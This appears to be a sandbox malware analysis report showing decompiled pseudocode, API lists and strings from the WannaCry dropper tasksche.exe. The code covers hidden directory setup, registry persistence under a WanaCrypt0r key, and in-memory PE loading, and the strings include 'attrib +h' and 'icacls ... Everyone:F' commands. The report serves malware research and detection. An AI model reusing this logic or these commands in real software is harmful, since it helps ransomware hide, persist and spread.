                                                          0x00402134
                                                          0x00402160
                                                          0x00402160
                                                          0x00000000
                                                          0x00402061
                                                          0x00402061
                                                          0x0040206f
                                                          0x0040207f
                                                          0x00000000
                                                          0x00402165
                                                          0x00402165
                                                          0x0040216b
                                                          0x0040216b
                                                          0x0040207f

                                                          APIs
                                                          • __p___argv.MSVCRT(0040F538), ref: 00402040
                                                          • strcmp.MSVCRT(?), ref: 0040204B
                                                          • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                                                          • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                                                            • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                                                          • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                                                          • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                                                          • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                                                            • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                            • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                            • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                            • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                                                          • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                                                          • API String ID: 1074704982-2844324180
                                                          • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                          • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                                                          • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                          • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E004010FD(intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				int _v16;
                                                          				void _v196;
                                                          				long _v216;
                                                          				void _v735;
                                                          				char _v736;
                                                          				signed int _t44;
                                                          				void* _t46;
                                                          				signed int _t55;
                                                          				signed int _t56;
                                                          				char* _t72;
                                                          				void* _t77;
                                                          
                                                          				_t56 = 5;
                                                          				memcpy( &_v216, L"Software\\", _t56 << 2);
                                                          				_push(0x2d);
                                                          				_v736 = _v736 & 0;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
                                                          				asm("stosw");
                                                          				asm("stosb");
                                                          				wcscat( &_v216, L"WanaCrypt0r");
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_t72 = "wd";
                                                          				do {
                                                          					_push( &_v8);
                                                          					_push( &_v216);
                                                          					if(_v12 != 0) {
                                                          						_push(0x80000001);
                                                          					} else {
                                                          						_push(0x80000002);
                                                          					}
                                                          					RegCreateKeyW();
                                                          					if(_v8 != 0) {
                                                          						if(_a4 == 0) {
                                                          							_v16 = 0x207;
                                                          							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
                                                          							asm("sbb esi, esi");
                                                          							_t77 =  ~_t44 + 1;
                                                          							if(_t77 != 0) {
                                                          								SetCurrentDirectoryA( &_v736);
                                                          							}
                                                          						} else {
                                                          							GetCurrentDirectoryA(0x207,  &_v736);
                                                          							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
                                                          							asm("sbb esi, esi");
                                                          							_t77 =  ~_t55 + 1;
                                                          						}
                                                          						RegCloseKey(_v8);
                                                          						if(_t77 != 0) {
                                                          							_t46 = 1;
                                                          							return _t46;
                                                          						} else {
                                                          							goto L10;
                                                          						}
                                                          					}
                                                          					L10:
                                                          					_v12 = _v12 + 1;
                                                          				} while (_v12 < 2);
                                                          				return 0;
                                                          			}
















                                                          0x0040110f
                                                          0x00401116
                                                          0x00401118
                                                          0x0040111c
                                                          0x00401129
                                                          0x0040113a
                                                          0x0040113c
                                                          0x0040113e
                                                          0x0040114b
                                                          0x00401151
                                                          0x00401157
                                                          0x0040115c
                                                          0x00401164
                                                          0x0040116b
                                                          0x0040116c
                                                          0x00401175
                                                          0x0040116e
                                                          0x0040116e
                                                          0x0040116e
                                                          0x0040117a
                                                          0x00401183
                                                          0x0040118c
                                                          0x004011cf
                                                          0x004011e4
                                                          0x004011ee
                                                          0x004011f0
                                                          0x004011f1
                                                          0x004011fa
                                                          0x004011fa
                                                          0x0040118e
                                                          0x0040119a
                                                          0x004011bd
                                                          0x004011c7
                                                          0x004011c9
                                                          0x004011c9
                                                          0x00401203
                                                          0x0040120b
                                                          0x00401222
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040120b
                                                          0x0040120d
                                                          0x0040120d
                                                          0x00401210
                                                          0x00000000

                                                          APIs
                                                          • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                                                          • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                                                          • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                                                          • strlen.MSVCRT(?), ref: 004011A7
                                                          • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                                                          • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                                                          • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                                                          • String ID: 0@$Software\$WanaCrypt0r
                                                          • API String ID: 865909632-3421300005
                                                          • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                          • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                                                          • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                          • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E00401B5F(intOrPtr _a4) {
                                                          				void _v202;
                                                          				short _v204;
                                                          				void _v722;
                                                          				long _v724;
                                                          				signed short _v1240;
                                                          				void _v1242;
                                                          				long _v1244;
                                                          				void* _t55;
                                                          				signed int _t65;
                                                          				void* _t72;
                                                          				long _t83;
                                                          				void* _t94;
                                                          				void* _t98;
                                                          
                                                          				_t83 =  *0x40f874; // 0x0
                                                          				_v1244 = _t83;
                                                          				memset( &_v1242, 0, 0x81 << 2);
                                                          				asm("stosw");
                                                          				_v724 = _t83;
                                                          				memset( &_v722, 0, 0x81 << 2);
                                                          				asm("stosw");
                                                          				_push(0x31);
                                                          				_v204 = _t83;
                                                          				memset( &_v202, 0, 0 << 2);
                                                          				asm("stosw");
                                                          				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
                                                          				GetWindowsDirectoryW( &_v1244, 0x104);
                                                          				_v1240 = _v1240 & 0x00000000;
                                                          				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
                                                          				_t98 = _t94 + 0x30;
                                                          				if(GetFileAttributesW( &_v724) == 0xffffffff) {
                                                          					L3:
                                                          					swprintf( &_v724, L"%s\\Intel",  &_v1244);
                                                          					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
                                                          						L2:
                                                          						_t55 = 1;
                                                          						return _t55;
                                                          					} else {
                                                          						GetTempPathW(0x104,  &_v724);
                                                          						if(wcsrchr( &_v724, 0x5c) != 0) {
                                                          							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
                                                          						}
                                                          						_t65 = E00401AF6( &_v724,  &_v204, _a4);
                                                          						asm("sbb eax, eax");
                                                          						return  ~( ~_t65);
                                                          					}
                                                          				}
                                                          				_t72 = E00401AF6( &_v724,  &_v204, _a4);
                                                          				_t98 = _t98 + 0xc;
                                                          				if(_t72 == 0) {
                                                          					goto L3;
                                                          				}
                                                          				goto L2;
                                                          			}
















                                                          0x00401b68
                                                          0x00401b80
                                                          0x00401b87
                                                          0x00401b89
                                                          0x00401b95
                                                          0x00401b9c
                                                          0x00401b9e
                                                          0x00401ba0
                                                          0x00401bab
                                                          0x00401bb4
                                                          0x00401bb6
                                                          0x00401bca
                                                          0x00401bdd
                                                          0x00401be9
                                                          0x00401c04
                                                          0x00401c06
                                                          0x00401c19
                                                          0x00401c40
                                                          0x00401c53
                                                          0x00401c70
                                                          0x00401c38
                                                          0x00401c3a
                                                          0x00000000
                                                          0x00401c8f
                                                          0x00401c97
                                                          0x00401cb2
                                                          0x00401cbf
                                                          0x00401cc4
                                                          0x00401cd6
                                                          0x00401ce0
                                                          0x00000000
                                                          0x00401ce2
                                                          0x00401c70
                                                          0x00401c2c
                                                          0x00401c31
                                                          0x00401c36
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                          • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                          • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                                                          • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                                                          • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                                                            • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                            • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                            • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                            • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                                                          • String ID: %s\Intel$%s\ProgramData
                                                          • API String ID: 3806094219-198707228
                                                          • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                          • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                                                          • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                          • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
                                                          				signed int _v8;
                                                          				intOrPtr _v40;
                                                          				char _v44;
                                                          				void* _t82;
                                                          				struct HINSTANCE__* _t83;
                                                          				intOrPtr* _t84;
                                                          				intOrPtr _t89;
                                                          				void* _t91;
                                                          				void* _t104;
                                                          				void _t107;
                                                          				intOrPtr _t116;
                                                          				intOrPtr _t124;
                                                          				signed int _t125;
                                                          				signed char _t126;
                                                          				intOrPtr _t127;
                                                          				signed int _t134;
                                                          				intOrPtr* _t145;
                                                          				signed int _t146;
                                                          				intOrPtr* _t151;
                                                          				intOrPtr _t152;
                                                          				short* _t153;
                                                          				signed int _t155;
                                                          				void* _t156;
                                                          				intOrPtr _t157;
                                                          				void* _t158;
                                                          				void* _t159;
                                                          				void* _t160;
                                                          
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t3 =  &_a8; // 0x40213f
                                                          				if(E00402457( *_t3, 0x40) == 0) {
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t153 = _a4;
                                                          				if( *_t153 == 0x5a4d) {
                                                          					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
                                                          						goto L37;
                                                          					}
                                                          					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
                                                          					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
                                                          						goto L2;
                                                          					} else {
                                                          						_t9 = _t151 + 0x38; // 0x68004021
                                                          						_t126 =  *_t9;
                                                          						if((_t126 & 0x00000001) != 0) {
                                                          							goto L2;
                                                          						}
                                                          						_t12 = _t151 + 0x14; // 0x4080e415
                                                          						_t13 = _t151 + 6; // 0x4080e0
                                                          						_t146 =  *_t13 & 0x0000ffff;
                                                          						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
                                                          						if(_t146 <= 0) {
                                                          							L16:
                                                          							_t83 = GetModuleHandleA("kernel32.dll");
                                                          							if(_t83 == 0) {
                                                          								goto L37;
                                                          							}
                                                          							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
                                                          							_t159 = _t158 + 0xc;
                                                          							if(_t84 == 0) {
                                                          								goto L37;
                                                          							}
                                                          							 *_t84( &_v44);
                                                          							_t86 = _v40;
                                                          							_t23 = _t151 + 0x50; // 0xec8b55c3
                                                          							_t25 = _t86 - 1; // 0xec8b55c2
                                                          							_t27 = _t86 - 1; // -1
                                                          							_t134 =  !_t27;
                                                          							_t155 =  *_t23 + _t25 & _t134;
                                                          							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
                                                          								goto L2;
                                                          							}
                                                          							_t31 = _t151 + 0x34; // 0x85680040
                                                          							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
                                                          							_t127 = _t89;
                                                          							_t160 = _t159 + 0x14;
                                                          							if(_t127 != 0) {
                                                          								L21:
                                                          								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
                                                          								_t156 = _t91;
                                                          								if(_t156 != 0) {
                                                          									 *((intOrPtr*)(_t156 + 4)) = _t127;
                                                          									_t38 = _t151 + 0x16; // 0xc3004080
                                                          									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
                                                          									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
                                                          									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
                                                          									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
                                                          									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
                                                          									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
                                                          									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
                                                          									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
                                                          									_t54 = _t151 + 0x54; // 0x8328ec83
                                                          									if(E00402457(_a8,  *_t54) == 0) {
                                                          										L36:
                                                          										E004029CC(_t156);
                                                          										goto L37;
                                                          									}
                                                          									_t57 = _t151 + 0x54; // 0x8328ec83
                                                          									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
                                                          									_t59 = _t151 + 0x54; // 0x8328ec83
                                                          									_a32 = _t104;
                                                          									memcpy(_t104, _a4,  *_t59);
                                                          									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
                                                          									 *_t156 = _t107;
                                                          									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
                                                          									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
                                                          										goto L36;
                                                          									}
                                                          									_t68 = _t151 + 0x34; // 0x85680040
                                                          									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
                                                          									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
                                                          										_t152 = 1;
                                                          										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
                                                          										_t152 = 1;
                                                          									}
                                                          									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
                                                          										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
                                                          										if(_t116 == 0) {
                                                          											 *((intOrPtr*)(_t156 + 0x34)) = 0;
                                                          											L41:
                                                          											return _t156;
                                                          										}
                                                          										if( *(_t156 + 0x14) == 0) {
                                                          											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
                                                          											goto L41;
                                                          										}
                                                          										_push(0);
                                                          										_push(_t152);
                                                          										_push(_t127);
                                                          										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
                                                          											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
                                                          											goto L41;
                                                          										}
                                                          										SetLastError(0x45a);
                                                          									}
                                                          									goto L36;
                                                          								}
                                                          								_a16(_t127, _t91, 0x8000, _a32);
                                                          								L23:
                                                          								SetLastError(0xe);
                                                          								L3:
                                                          								goto L37;
                                                          							}
                                                          							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
                                                          							_t160 = _t160 + 0x14;
                                                          							if(_t127 == 0) {
                                                          								goto L23;
                                                          							}
                                                          							goto L21;
                                                          						}
                                                          						_t145 = _t82 + 0xc;
                                                          						do {
                                                          							_t157 =  *((intOrPtr*)(_t145 + 4));
                                                          							_t124 =  *_t145;
                                                          							if(_t157 != 0) {
                                                          								_t125 = _t124 + _t157;
                                                          							} else {
                                                          								_t125 = _t124 + _t126;
                                                          							}
                                                          							if(_t125 > _v8) {
                                                          								_v8 = _t125;
                                                          							}
                                                          							_t145 = _t145 + 0x28;
                                                          							_t146 = _t146 - 1;
                                                          						} while (_t146 != 0);
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          				L2:
                                                          				SetLastError(0xc1);
                                                          				goto L3;
                                                          			}






























                                                          0x004021ef
                                                          0x004021f8
                                                          0x00402204
                                                          0x0040243d
                                                          0x00000000
                                                          0x0040243d
                                                          0x0040220a
                                                          0x00402212
                                                          0x00402239
                                                          0x00000000
                                                          0x00000000
                                                          0x00402242
                                                          0x0040224a
                                                          0x00000000
                                                          0x00402254
                                                          0x00402254
                                                          0x00402254
                                                          0x0040225a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040225c
                                                          0x00402260
                                                          0x00402260
                                                          0x00402266
                                                          0x0040226a
                                                          0x0040228c
                                                          0x00402291
                                                          0x00402299
                                                          0x00000000
                                                          0x00000000
                                                          0x004022a7
                                                          0x004022aa
                                                          0x004022af
                                                          0x00000000
                                                          0x00000000
                                                          0x004022b9
                                                          0x004022bb
                                                          0x004022be
                                                          0x004022c1
                                                          0x004022c8
                                                          0x004022cb
                                                          0x004022d1
                                                          0x004022d7
                                                          0x00000000
                                                          0x00000000
                                                          0x004022e8
                                                          0x004022eb
                                                          0x004022ee
                                                          0x004022f0
                                                          0x004022f5
                                                          0x0040230f
                                                          0x0040231a
                                                          0x00402320
                                                          0x00402324
                                                          0x0040233d
                                                          0x00402340
                                                          0x0040234a
                                                          0x00402350
                                                          0x00402356
                                                          0x0040235c
                                                          0x00402362
                                                          0x00402368
                                                          0x0040236e
                                                          0x00402374
                                                          0x00402377
                                                          0x00402386
                                                          0x00402436
                                                          0x00402437
                                                          0x00000000
                                                          0x0040243c
                                                          0x00402396
                                                          0x0040239a
                                                          0x0040239d
                                                          0x004023a0
                                                          0x004023a7
                                                          0x004023ba
                                                          0x004023bc
                                                          0x004023bf
                                                          0x004023cc
                                                          0x00000000
                                                          0x00000000
                                                          0x004023d3
                                                          0x004023d3
                                                          0x004023d6
                                                          0x004023eb
                                                          0x004023ec
                                                          0x004023d8
                                                          0x004023e0
                                                          0x004023e6
                                                          0x004023e6
                                                          0x004023f8
                                                          0x00402414
                                                          0x00402419
                                                          0x0040244d
                                                          0x00402450
                                                          0x00000000
                                                          0x00402450
                                                          0x0040241e
                                                          0x00402448
                                                          0x00000000
                                                          0x00402448
                                                          0x00402420
                                                          0x00402421
                                                          0x00402424
                                                          0x00402429
                                                          0x00402441
                                                          0x00000000
                                                          0x00402441
                                                          0x00402430
                                                          0x00402430
                                                          0x00000000
                                                          0x004023f8
                                                          0x00402330
                                                          0x00402336
                                                          0x00402219
                                                          0x00402219
                                                          0x00000000
                                                          0x00402219
                                                          0x00402306
                                                          0x00402308
                                                          0x0040230d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040230d
                                                          0x0040226c
                                                          0x0040226f
                                                          0x0040226f
                                                          0x00402272
                                                          0x00402276
                                                          0x0040227c
                                                          0x00402278
                                                          0x00402278
                                                          0x00402278
                                                          0x00402281
                                                          0x00402283
                                                          0x00402283
                                                          0x00402286
                                                          0x00402289
                                                          0x00402289
                                                          0x00000000
                                                          0x0040226f
                                                          0x0040224a
                                                          0x00402214
                                                          0x00402219
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                                                          • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                                                          • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                                                          • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                                                            • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                                                          • SetLastError.KERNEL32(0000045A), ref: 00402430
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                                                          • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 1900561814-3657104962
                                                          • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                          • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                                                          • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                          • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
                                                          				void* _t15;
                                                          				WCHAR* _t17;
                                                          
                                                          				CreateDirectoryW(_a4, 0);
                                                          				if(SetCurrentDirectoryW(_a4) == 0) {
                                                          					L2:
                                                          					return 0;
                                                          				}
                                                          				_t17 = _a8;
                                                          				CreateDirectoryW(_t17, 0);
                                                          				if(SetCurrentDirectoryW(_t17) != 0) {
                                                          					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
                                                          					if(_a12 != 0) {
                                                          						_push(_t17);
                                                          						swprintf(_a12, L"%s\\%s", _a4);
                                                          					}
                                                          					_t15 = 1;
                                                          					return _t15;
                                                          				}
                                                          				goto L2;
                                                          			}





                                                          0x00401b07
                                                          0x00401b16
                                                          0x00401b27
                                                          0x00000000
                                                          0x00401b27
                                                          0x00401b18
                                                          0x00401b1e
                                                          0x00401b25
                                                          0x00401b36
                                                          0x00401b40
                                                          0x00401b42
                                                          0x00401b4e
                                                          0x00401b54
                                                          0x00401b59
                                                          0x00000000
                                                          0x00401b59
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                                                          • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Directory$AttributesCreateCurrentFile$swprintf
                                                          • String ID: %s\%s
                                                          • API String ID: 1036847564-4073750446
                                                          • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                          • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                                                          • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                          • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				struct _STARTUPINFOA _v88;
                                                          				signed int _t32;
                                                          				intOrPtr _t37;
                                                          
                                                          				_t32 = 0x10;
                                                          				_v88.cb = 0x44;
                                                          				memset( &(_v88.lpReserved), 0, _t32 << 2);
                                                          				_v20.hProcess = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t37 = 1;
                                                          				_v88.wShowWindow = 0;
